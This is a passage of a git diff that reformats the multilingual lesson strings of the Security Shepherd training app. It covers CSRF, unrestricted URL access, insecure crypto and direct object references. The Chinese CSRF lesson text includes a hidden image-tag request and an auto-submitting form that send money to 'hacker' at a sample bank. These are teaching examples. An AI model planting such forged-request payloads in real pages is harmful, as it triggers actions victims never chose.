+paragraph.info2 = \u4E3A\u4E86\u9632\u6B62 CSRF \u653B\u51FB,\u6BCF\u4E00\u4E2A\u7528\u6237\u8BF7\u6C42\u90FD\u5FC5\u987B\u5305\u542B\u4E00\u4E2A\u4E34\u65F6Token(\u4E0D\u53EF\u9884\u77E5\u7684\u6570,\u5373\u968F\u673A\u6570).\u8981\u5728\u5E94\u7528\u7A0B\u5E8F\u4E2D\u627E\u5230 CSRF \u6F0F\u6D1E, Token \u5C31\u662F\u9700\u8981\u6211\u4EEC\u6D4B\u8BD5\u7684\u4E00\u4E2A\u5143\u7D20.\u5982\u679C\u4E00\u4E2A\u8BF7\u6C42\u6CA1\u6709\u5305\u542B\u968F\u5373\u6570,\u90A3\u4E48\u662F\u5F88\u6709\u53EF\u80FD\u88AB CSRF \u653B\u51FB\u7684. \u5982\u679C\u4E00\u4E2A\u8BF7\u6C42\u4E2D\u5305\u542B\u4E86\u4E00\u4E2A\u968F\u5373\u6570,\u90A3\u4E48\u5C31\u9700\u8981\u66F4\u591A\u7684\u6B65\u9AA4\u6765\u5BF9 CSRF \u8FDB\u884C\u6D4B\u8BD5.\u5C3D\u7BA1\u968F\u673A\u6570\u662F\u5728\u8BF7\u6C42\u5F53\u4E2D,\u5B83\u6709\u53EF\u80FD\u4E0D\u88AB\u9A8C\u8BC1\u6216\u53EF\u80FD\u5C31\u662F\u4E00\u4E2A\u7A7A\u503C. \u90A3\u4E48,\u5E94\u7528\u7A0B\u5E8F\u7684\u968F\u673A\u6570\u7BA1\u7406\u53EF\u80FD\u5141\u8BB8\u653B\u51FB\u8005\u4F7F\u7528\u4ED6\u4EEC\u672C\u8EAB\u6709\u6548\u7684\u968F\u673A\u6570\u4F7F\u7528\u5728\u5176\u4ED6\u7528\u6237\u7684\u8BF7\u6C42\u4E2D.
+paragraph.info3 = HTTP \u8BF7\u6C42\u53EF\u4EE5\u901A\u8FC7 JavaScript \u53D1\u9001. \u4EE5\u8FD9\u79CD\u65B9\u5F0F\u53D1\u9001\u7684\u8BF7\u6C42\u5305\u542B\u4E00\u4E2A HTTP \u6807\u5934 "X-Requested-With". \u5982\u679C\u8BE5\u6807\u5934\u88AB\u67E5\u9A8C\u5728\u4F20\u5165\u7684\u8BF7\u6C42\u4E2D, \u8FD9\u53EF\u4EE5\u4F5C\u4E3A\u4E00\u4E2A\u5BF9 CSRF \u6CA1\u6709\u968F\u673A\u503C\u7684\u4FDD\u62A4. \u5B83\u4E0D\u80FD\u4ECE\u8FDC\u7A0B\u57DF\u590D\u5236, \u7531\u4E8E Same Origin Policy\u53EF\u4EE5\u9632\u6B62\u653B\u51FB\u8005\u8FDB\u884C\u8FDC\u7A0B\u653B\u51FB. \u4F46\u662F\u4E0D\u5EFA\u8BAE\u4EE5\u6B64\u4F5C\u4E3A\u552F\u4E00\u7684 CSRF \u4FDD\u62A4\u6A21\u5F0F, \u56E0\u4E3A\u5E38\u88AB\u53D1\u73B0\u7684\u6D4F\u89C8\u5668\u95EE\u9898\u662F\u5141\u8BB8\u653B\u51FB\u8005\u901A\u8FC7\u4E00\u4E2A\u6D4F\u89C8\u5668\u53D1\u9001\u8DE8\u57DF\u8BF7\u6C42.
+paragraph.info4 = CSRF \u653B\u51FB\u53EF\u4EE5\u53D1\u751F\u5728 GET \u548C POST HTTP \u8BF7\u6C42\. \u8981\u4F7F\u53D7\u5BB3\u8005\u53EF\u4EE5\u65E0\u5F62\u5730\u63D0\u4EA4\u4E00\u4E2A GET \u8BF7\u6C42, \u8BE5\u8BF7\u6C42\u53EF\u4EE5\u5D4C\u5165\u5230\u7F51\u9875\u4E0A\u7684\u4E00\u4E2A\u56FE\u50CF\u6807\u7B7E, \u4F8B\u5982; <img src="http://www.secureBank.ie/sendMoney?giveMoneyTo=hacker&giveAmount=1000"/>
+paragraph.info5 = \u8981\u5F3A\u8FEB\u53D7\u5BB3\u8005\u53D1\u9001\u4E00\u4E2A POST \u8BF7,\u6C42\u5E76\u975E\u8F7B\u800C\u6613\u4E3E.\u6700\u7B80\u5355\u7684\u65B9\u6CD5\u662F\u4F7F\u7528 JavaScript \u521B\u5EFA\u4E00\u4E2A\u81EA\u52A8\u63D0\u4EA4\u7684\u8868\u683C,\u5728\u6B64\u63D0\u4F9B\u4E9B\u793A\u4F8B\u5982\u4E0B; <form name="csrfForm" action="http://www.secureBank.ie/sendMoney" method="POST"> <input type="hidden" name="giveMoneyTo" value="hacker" /> <input type="hidden" name="giveAmount" value="1000" /> <input type="submit"/> </form> <script> document.csrfForm.submit(); </script>
+paragraph.info6 = \u5BF9\u4E8E\u7528\u6237\u800C\u8A00,\u5B8C\u6210\u8BE5\u8BFE\u7A0B\u7684\u6807\u5FD7\u662F\u4F7F\u7531\u7BA1\u7406\u5458\u4F7F\u7528\u7684\u529F\u80FD\u88AB\u521D\u59CB\u5316\u4E3A\u53D1\u9001\u4EE5\u4E0B GET request\u5230\u8FD9\u53F0\u670D\u52A1\u5668.\u5176\u4E2D'exampleId'\u662F\u4E00\u4E2A\u6709\u6548\u7684 userId.
+paragraph.info7 = \u8981\u5B8C\u6210\u8BE5\u8BFE\u7A0B,\u9700\u53D1\u9001\u4E00\u6761\u542B\u56FE\u7247 URL \u7684\u4FE1\u606F\u7ED9\u7BA1\u7406\u5458,\u5176\u5C06\u663E\u793A\u5728\u4E00\u4E2A\u5D4C\u5165\u7684\u6807\u7B7E\u4E2D,\u5B83\u5C06\u5F3A\u8FEB\u4ED6\u4EEC\u63D0\u4EA4\u4E0A\u8FF0\u8BF7\u6C42(Request),\u4EE3\u66FF exampleId \u7684\u4E34\u65F6 userId \u662F
+challenge.title = \u8054\u7CFB\u7BA1\u7406\u5458
+challenge.description = \u8BF7\u8F93\u5165\u4F60\u60F3\u53D1\u9001\u7ED9 Security Shepherd 24 \u5C0F\u65F6\u670D\u52A1\u7684\u7BA1\u7406\u5458\u4E2D\u7684\u4E00\u4E2A\u7684\u56FE\u50CFURL
+
+button.hideIntro = \u9690\u85CF CSRF \u4ECB\u7ECD
+button.showIntro = \u663E\u793A CSRF \u4ECB\u7ECD
+button.sendMessage = \u53D1\u9001\u4FE1\u606F
+
+generic.loading = \u8BF7\u7A0D\u4FAF
+generic.error = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
diff --git a/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.properties b/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.properties
index 1fb0214af..7d743580a 100644
--- a/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.properties
+++ b/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3.properties
@@ -1,9 +1,12 @@
-title.question.fail_restrict_url_acc=What is a Failure to Restrict URL Access?
-paragraph.info1=An application that fails to restrict URL access is an application that is not protecting its "protected" pages sufficiently. This occurs when an application hides functionality from basic users. In an application that fails to restrict URL access, administration links are only put onto the page if the user is an administrator. If users discover a page's address, they can still access it via URL access.
-paragraph.info2=Preventing unauthorized URL access requires selecting an approach for requiring proper authentication and proper authorization for each page. The easier the authentication is to include in a page the more likely that all pages will be covered by the policy.
-challenge.description=The result key to this lesson is stored in a web page only administrators know about.
-challenge.adminLink=Administrator Result Page
-challenge.adminComment=This is only displayed for Administrators
-challenge.resultKey=Result Key
-button.hideLesson=Hide Lesson Introduction
-button.showLesson=Show Lesson Introduction
\ No newline at end of file
+title.question.fail_restrict_url_acc = What is a Failure to Restrict URL Access?
+
+paragraph.info1 = An application that fails to restrict URL access is an application that is not protecting its "protected" pages sufficiently. This occurs when an application hides functionality from basic users. In an application that fails to restrict URL access, administration links are only put onto the page if the user is an administrator. If users discover a page's address, they can still access it via URL access.
+paragraph.info2 = Preventing unauthorized URL access requires selecting an approach for requiring proper authentication and proper authorization for each page. The easier the authentication is to include in a page the more likely that all pages will be covered by the policy.
+
+challenge.description = The result key to this lesson is stored in a web page only administrators know about.
+challenge.adminLink = Administrator Result Page
+challenge.adminComment = This is only displayed for Administrators
+challenge.resultKey = Result Key
+
+button.hideLesson = Hide Lesson Introduction
+button.showLesson = Show Lesson Introduction
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3_zh.properties b/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3_zh.properties
index 4849fc465..3c445b88d 100644
--- a/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3_zh.properties
+++ b/src/main/resources/i18n/lessons/failure_to_restrict_url_access/oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3_zh.properties
@@ -1,9 +1,13 @@
-title.question.fail_restrict_url_acc=\u4EC0\u4E48\u662F\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE?
-paragraph.info1=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE\u7684\u5E94\u7528\u7A0B\u5E8F,\u662F\u6307\u8BE5\u5E94\u7528\u7A0B\u5E8F\u672A\u80FD\u5145\u5206\u4FDD\u62A4'\u9700\u8981\u4FDD\u62A4\u7684'\u9875\u9762.\u8FD9\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u5411\u666E\u901A\u7528\u6237\u9690\u85CF\u90E8\u5206\u529F\u80FD.\u5728\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE\u7684\u5E94\u7528\u7A0B\u5E8F\u4E2D,\u7BA1\u7406\u94FE\u63A5\u4EC5\u663E\u793A\u5728\u8EAB\u4EFD\u4E3A\u7BA1\u7406\u5458\u7684\u7528\u6237\u7684\u9875\u9762.\u5982\u679C\u7528\u6237\u53D1\u73B0\u4E00\u4E2A\u9875\u9762\u7684\u5730\u5740,\u4ED6\u4EEC\u4ECD\u7136\u53EF\u4EE5\u901A\u8FC7URL\u8FDB\u884C\u8BBF\u95EE.
-paragraph.info2=\u9632\u6B62\u672A\u6388\u6743\u7684URL\u8BBF\u95EE\u9700\u8981\u9009\u62E9\u4E00\u79CD\u65B9\u6CD5, \u8BE5\u65B9\u6CD5\u662F\u6BCF\u4E00\u4E2A\u9875\u9762\u90FD\u9700\u8981\u9002\u5F53\u7684\u8EAB\u4EFD\u9A8C\u8BC1\u548C\u9002\u5F53\u7684\u6388\u6743\u624D\u80FD\u8FDB\u5165. \u5728\u4E00\u4E2A\u9875\u9762\u4E2D\u5305\u542B\u7684\u8BA4\u8BC1\u8D8A\u7B80\u5355,\u8D8A\u53EF\u80FD\u6240\u6709\u9875\u9762\u88AB\u653F\u7B56\u6240\u8986\u76D6.
-challenge.description=\u8BE5\u8BFE\u7684\u7ED3\u679C\u5BC6\u5319\u88AB\u50A8\u5B58\u5728\u4E00\u4E2A\u53EA\u6709\u7BA1\u7406\u5458\u77E5\u9053\u7684\u9875\u9762.
-challenge.adminLink=\u7BA1\u7406\u5458\u7ED3\u679C\u9875\u9762
-challenge.adminComment=\u8FD9\u4EC5\u663E\u793A\u7ED9\u7BA1\u7406\u5458
-challenge.resultKey=\u7ED3\u679C\u5BC6\u5319
-button.hideLesson=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showLesson=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+title.question.fail_restrict_url_acc = \u4EC0\u4E48\u662F\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE?
+
+paragraph.info1 = \u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE\u7684\u5E94\u7528\u7A0B\u5E8F,\u662F\u6307\u8BE5\u5E94\u7528\u7A0B\u5E8F\u672A\u80FD\u5145\u5206\u4FDD\u62A4'\u9700\u8981\u4FDD\u62A4\u7684'\u9875\u9762.\u8FD9\u53D1\u751F\u5728\u5F53\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F\u5411\u666E\u901A\u7528\u6237\u9690\u85CF\u90E8\u5206\u529F\u80FD.\u5728\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE\u7684\u5E94\u7528\u7A0B\u5E8F\u4E2D,\u7BA1\u7406\u94FE\u63A5\u4EC5\u663E\u793A\u5728\u8EAB\u4EFD\u4E3A\u7BA1\u7406\u5458\u7684\u7528\u6237\u7684\u9875\u9762.\u5982\u679C\u7528\u6237\u53D1\u73B0\u4E00\u4E2A\u9875\u9762\u7684\u5730\u5740,\u4ED6\u4EEC\u4ECD\u7136\u53EF\u4EE5\u901A\u8FC7URL\u8FDB\u884C\u8BBF\u95EE.
+paragraph.info2 = \u9632\u6B62\u672A\u6388\u6743\u7684URL\u8BBF\u95EE\u9700\u8981\u9009\u62E9\u4E00\u79CD\u65B9\u6CD5, \u8BE5\u65B9\u6CD5\u662F\u6BCF\u4E00\u4E2A\u9875\u9762\u90FD\u9700\u8981\u9002\u5F53\u7684\u8EAB\u4EFD\u9A8C\u8BC1\u548C\u9002\u5F53\u7684\u6388\u6743\u624D\u80FD\u8FDB\u5165. \u5728\u4E00\u4E2A\u9875\u9762\u4E2D\u5305\u542B\u7684\u8BA4\u8BC1\u8D8A\u7B80\u5355,\u8D8A\u53EF\u80FD\u6240\u6709\u9875\u9762\u88AB\u653F\u7B56\u6240\u8986\u76D6.
+
+
+challenge.description = \u8BE5\u8BFE\u7684\u7ED3\u679C\u5BC6\u5319\u88AB\u50A8\u5B58\u5728\u4E00\u4E2A\u53EA\u6709\u7BA1\u7406\u5458\u77E5\u9053\u7684\u9875\u9762.
+challenge.adminLink = \u7BA1\u7406\u5458\u7ED3\u679C\u9875\u9762
+challenge.adminComment = \u8FD9\u4EC5\u663E\u793A\u7ED9\u7BA1\u7406\u5458
+challenge.resultKey = \u7ED3\u679C\u5BC6\u5319
+
+button.hideLesson = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showLesson = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
diff --git a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.properties b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.properties
index f7b5fe55a..a15f3f8ee 100644
--- a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.properties
+++ b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2.properties
@@ -1,6 +1,9 @@
-title.question.insecure_crypto=What is Insecure Cryptographic Storage?
-paragraph.info1=The most common flaw in this area is simply not encrypting data that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys and weak algorithm usage is common. Use of weak or unsalted hashes to protect passwords is also common. These mistakes can compromise all of the data that should have been encrypted. Typically this information includes sensitive data such as health records, credentials, personal data, credit cards, etc.
-paragraph.info2=Imagine an application that encrypts credit cards in a database to prevent exposure to end users. However, the database is set to automatically decrypt queries against the credit card columns, allowing an SQL injection flaw to retrieve all the credit cards in clear text. The system should have been configured to allow only back end applications to decrypt them, not the front end web application.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-challenge.description=The decision has been made that the result key to this lesson should not be publicly available. To achieve this, the development team have decided to encode the result key with base64... recover it to complete the lesson.
\ No newline at end of file
+title.question.insecure_crypto = What is Insecure Cryptographic Storage?
+
+paragraph.info1 = The most common flaw in this area is simply not encrypting data that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys and weak algorithm usage is common. Use of weak or unsalted hashes to protect passwords is also common. These mistakes can compromise all of the data that should have been encrypted. Typically this information includes sensitive data such as health records, credentials, personal data, credit cards, etc.
+paragraph.info2 = Imagine an application that encrypts credit cards in a database to prevent exposure to end users. However, the database is set to automatically decrypt queries against the credit card columns, allowing an SQL injection flaw to retrieve all the credit cards in clear text. The system should have been configured to allow only back end applications to decrypt them, not the front end web application.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+challenge.description = The decision has been made that the result key to this lesson should not be publicly available. To achieve this, the development team have decided to encode the result key with base64... recover it to complete the lesson.
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_ga.properties b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_ga.properties
index 077738b7a..024840e5a 100644
--- a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_ga.properties
+++ b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_ga.properties
@@ -1 +1 @@
-title.question.insecure_crypto=Cád é Insecure Cryptographic Storage?
\ No newline at end of file
+title.question.insecure_crypto = Cád é Insecure Cryptographic Storage?
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_zh.properties b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_zh.properties
index 87e1d0129..f453fa9f8 100644
--- a/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_zh.properties
+++ b/src/main/resources/i18n/lessons/insecure_crypto/if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2_zh.properties
@@ -1,6 +1,9 @@
-title.question.insecure_crypto=\u4EC0\u4E48\u662F\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8?
-paragraph.info1=\u5728\u8FD9\u65B9\u9762\u6700\u5E38\u89C1\u7684\u7F3A\u9677\u662F\u7B80\u5355\u7684\u6CA1\u6709\u52A0\u5BC6\u90A3\u4E9B\u9700\u8981\u52A0\u5BC6\u7684\u6570\u636E.\u800C\u5728\u4F7F\u7528\u52A0\u5BC6\u7684\u60C5\u51B5\u4E0B,\u4E0D\u5B89\u5168\u5BC6\u5319\u7684\u751F\u6210\u548C\u50A8\u5B58,\u4E0D\u8F6C\u52A8\u94A5\u5319\u548C\u5F31\u7684\u7B97\u6CD5\u7684\u4F7F\u7528\u90FD\u662F\u6BD4\u8F83\u5E38\u89C1\u7684.\u4F7F\u7528\u5F31\u7684\u52A0\u5BC6\u6216\u672A\u52A0\u5BC6\u65B9\u5F0F\u6765\u4FDD\u62A4\u5BC6\u7801\u4E5F\u5F88\u666E\u904D.\u800C\u8FD9\u4E9B\u9519\u8BEF\u53EF\u4EE5\u6CC4\u9732\u6240\u6709\u5E94\u5DF2\u52A0\u5BC6\u7684\u6570\u636E.\u901A\u5E38\u6765\u8BF4,\u8FD9\u4E9B\u4FE1\u606F\u5305\u62EC\u654F\u611F\u6570\u636E,\u6BD4\u5982\u5065\u5EB7\u8BB0\u5F55,\u4E2A\u4EBA\u51ED\u8BC1,\u4E2A\u4EBA\u4FE1\u606F,\u4EE5\u53CA\u4FE1\u7528\u5361\u7B49.
-paragraph.info2=\u8BD5\u60F3\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F,\u4E3A\u9632\u6B62\u6570\u636E\u88AB\u66B4\u9732\u5728\u7EC8\u7AEF,\u5C06\u4FE1\u7528\u5361\u4FE1\u606F\u52A0\u5BC6.\u7136\u800C,\u6570\u636E\u5E93\u88AB\u8BBE\u7F6E\u6210\u81EA\u52A8\u89E3\u5BC6\u67E5\u8BE2\u4FE1\u7528\u5361\u5728\u6570\u636E\u5E93\u4E2D\u7684\u5217,\u4E5F\u5C31\u662F\u5141\u8BB8\u4E00\u4E2ASQL\u6CE8\u5165\u6F0F\u6D1E\u4EE5\u660E\u6587\u5F62\u5F0F\u6765\u68C0\u7D22\u6240\u6709\u7684\u4FE1\u7528\u5361.
-button.hideIntro=\u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
-button.showIntro=\u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
-challenge.description=\u901A\u8FC7\u8BE5\u8BFE\u7A0B\u7684\u7ED3\u679C\u5BC6\u5319\u88AB\u8BA4\u4E3A\u662F\u4E0D\u5E94\u8BE5\u5411\u5927\u4F17\u516C\u5F00\u7684,\u5F00\u53D1\u4EBA\u5458\u5DF2\u7ECF\u5C06\u7ED3\u679C\u5BC6\u5319\u4EE5base64\u65B9\u5F0F\u52A0\u5BC6\u4E86,\u6062\u590D\u5BC6\u5319\u6765\u5B8C\u6210\u8BE5\u8BFE.
+title.question.insecure_crypto = \u4EC0\u4E48\u662F\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8?
+
+paragraph.info1 = \u5728\u8FD9\u65B9\u9762\u6700\u5E38\u89C1\u7684\u7F3A\u9677\u662F\u7B80\u5355\u7684\u6CA1\u6709\u52A0\u5BC6\u90A3\u4E9B\u9700\u8981\u52A0\u5BC6\u7684\u6570\u636E.\u800C\u5728\u4F7F\u7528\u52A0\u5BC6\u7684\u60C5\u51B5\u4E0B,\u4E0D\u5B89\u5168\u5BC6\u5319\u7684\u751F\u6210\u548C\u50A8\u5B58,\u4E0D\u8F6C\u52A8\u94A5\u5319\u548C\u5F31\u7684\u7B97\u6CD5\u7684\u4F7F\u7528\u90FD\u662F\u6BD4\u8F83\u5E38\u89C1\u7684.\u4F7F\u7528\u5F31\u7684\u52A0\u5BC6\u6216\u672A\u52A0\u5BC6\u65B9\u5F0F\u6765\u4FDD\u62A4\u5BC6\u7801\u4E5F\u5F88\u666E\u904D.\u800C\u8FD9\u4E9B\u9519\u8BEF\u53EF\u4EE5\u6CC4\u9732\u6240\u6709\u5E94\u5DF2\u52A0\u5BC6\u7684\u6570\u636E.\u901A\u5E38\u6765\u8BF4,\u8FD9\u4E9B\u4FE1\u606F\u5305\u62EC\u654F\u611F\u6570\u636E,\u6BD4\u5982\u5065\u5EB7\u8BB0\u5F55,\u4E2A\u4EBA\u51ED\u8BC1,\u4E2A\u4EBA\u4FE1\u606F,\u4EE5\u53CA\u4FE1\u7528\u5361\u7B49.
+paragraph.info2 = \u8BD5\u60F3\u4E00\u4E2A\u5E94\u7528\u7A0B\u5E8F,\u4E3A\u9632\u6B62\u6570\u636E\u88AB\u66B4\u9732\u5728\u7EC8\u7AEF,\u5C06\u4FE1\u7528\u5361\u4FE1\u606F\u52A0\u5BC6.\u7136\u800C,\u6570\u636E\u5E93\u88AB\u8BBE\u7F6E\u6210\u81EA\u52A8\u89E3\u5BC6\u67E5\u8BE2\u4FE1\u7528\u5361\u5728\u6570\u636E\u5E93\u4E2D\u7684\u5217,\u4E5F\u5C31\u662F\u5141\u8BB8\u4E00\u4E2ASQL\u6CE8\u5165\u6F0F\u6D1E\u4EE5\u660E\u6587\u5F62\u5F0F\u6765\u68C0\u7D22\u6240\u6709\u7684\u4FE1\u7528\u5361.
+
+button.hideIntro = \u9690\u85CF\u8BFE\u7A0B\u4ECB\u7ECD
+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+
+challenge.description = \u901A\u8FC7\u8BE5\u8BFE\u7A0B\u7684\u7ED3\u679C\u5BC6\u5319\u88AB\u8BA4\u4E3A\u662F\u4E0D\u5E94\u8BE5\u5411\u5927\u4F17\u516C\u5F00\u7684,\u5F00\u53D1\u4EBA\u5458\u5DF2\u7ECF\u5C06\u7ED3\u679C\u5BC6\u5319\u4EE5base64\u65B9\u5F0F\u52A0\u5BC6\u4E86,\u6062\u590D\u5BC6\u5319\u6765\u5B8C\u6210\u8BE5\u8BFE.
diff --git a/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.properties b/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.properties
index 97905724e..29e66bd0c 100644
--- a/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.properties
+++ b/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100.properties
@@ -1,18 +1,23 @@
-title.quesetion.insecure_direct_object_ref=What are Insecure Direct Object References?
-paragraph.info1=Imagine a web page that allows you to view your personal information. The web page that shows the user their information is generated based on a user ID. If this page was vulnerable to insecure Direct Object References an attacker would be able to modify the user identifier parameter to reference any user object in the system. Insecure Direct Object References occur when an application references an object by its actual ID or name. This object that is referenced directly is used to generate a web page. If the application does not verify that the user is allowed to reference this object, then the object is insecurely referenced.
-paragraph.info2=Attackers can use insecure object references to compromise any information that can be referenced by the parameter in question. In the above example, the attacker can access any user's personal information.
-paragraph.info3=The severity of insecure direct object references varies depending on the data that is compromised. If the compromised data is publicly available or not supposed to be restricted, it becomes a very low severity vulnerability. Consider a scenario where one company is able to retrieve their competitor's information. Suddenly, the business impact of the vulnerability is critical. These vulnerabilities still need to be fixed and should never be found in professional grade applications.
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-sign.loading=Loading
-sign.hint=Would you link a hint
-challenge.description=The result key to complete this lesson is stored in the administrators profile.
-challenge.refresh=Refresh your Profile
-challenge.userTitle=User
-challenge.guest=Guest
-challenge.age=Age
-challenge.address=Address
-challenge.email=Email
-challenge.message=Private Message
-challenge.noMessage=No Private Message Set
-generic.error=An Error Occurred
\ No newline at end of file
+title.quesetion.insecure_direct_object_ref = What are Insecure Direct Object References?
+
+paragraph.info1 = Imagine a web page that allows you to view your personal information. The web page that shows the user their information is generated based on a user ID. If this page was vulnerable to insecure Direct Object References an attacker would be able to modify the user identifier parameter to reference any user object in the system. Insecure Direct Object References occur when an application references an object by its actual ID or name. This object that is referenced directly is used to generate a web page. If the application does not verify that the user is allowed to reference this object, then the object is insecurely referenced.
+paragraph.info2 = Attackers can use insecure object references to compromise any information that can be referenced by the parameter in question. In the above example, the attacker can access any user's personal information.
+paragraph.info3 = The severity of insecure direct object references varies depending on the data that is compromised. If the compromised data is publicly available or not supposed to be restricted, it becomes a very low severity vulnerability. Consider a scenario where one company is able to retrieve their competitor's information. Suddenly, the business impact of the vulnerability is critical. These vulnerabilities still need to be fixed and should never be found in professional grade applications.
+
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+
+sign.loading = Loading
+sign.hint = Would you link a hint
+
+challenge.description = The result key to complete this lesson is stored in the administrators profile.
+challenge.refresh = Refresh your Profile
+challenge.userTitle = User
+challenge.guest = Guest
+challenge.age = Age
+challenge.address = Address
+challenge.email = Email
+challenge.message = Private Message
+challenge.noMessage = No Private Message Set
+
+generic.error = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100_zh.properties b/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100_zh.properties
index 01aa9003e..7a18d6744 100644
--- a/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100_zh.properties
+++ b/src/main/resources/i18n/lessons/insecure_direct_object_ref/fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100_zh.properties
@@ -1,19 +1,25 @@
-title.quesetion.insecure_direct_object_ref=\u4EC0\u4E48\u662F\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528?
-paragraph.info1=\u60F3\u8C61\u4E00\u4E2A\u5141\u8BB8\u60A8\u67E5\u770B\u60A8\u7684\u4E2A\u4EBA\u4FE1\u606F\u7684\u7F51\u9875.\u8BE5\u7F51\u9875\u4E0A\u663E\u793A\u7528\u6237\u7684\u4FE1\u606F\u662F\u4EA7\u751F\u4E8E\u7528\u6237\u7684 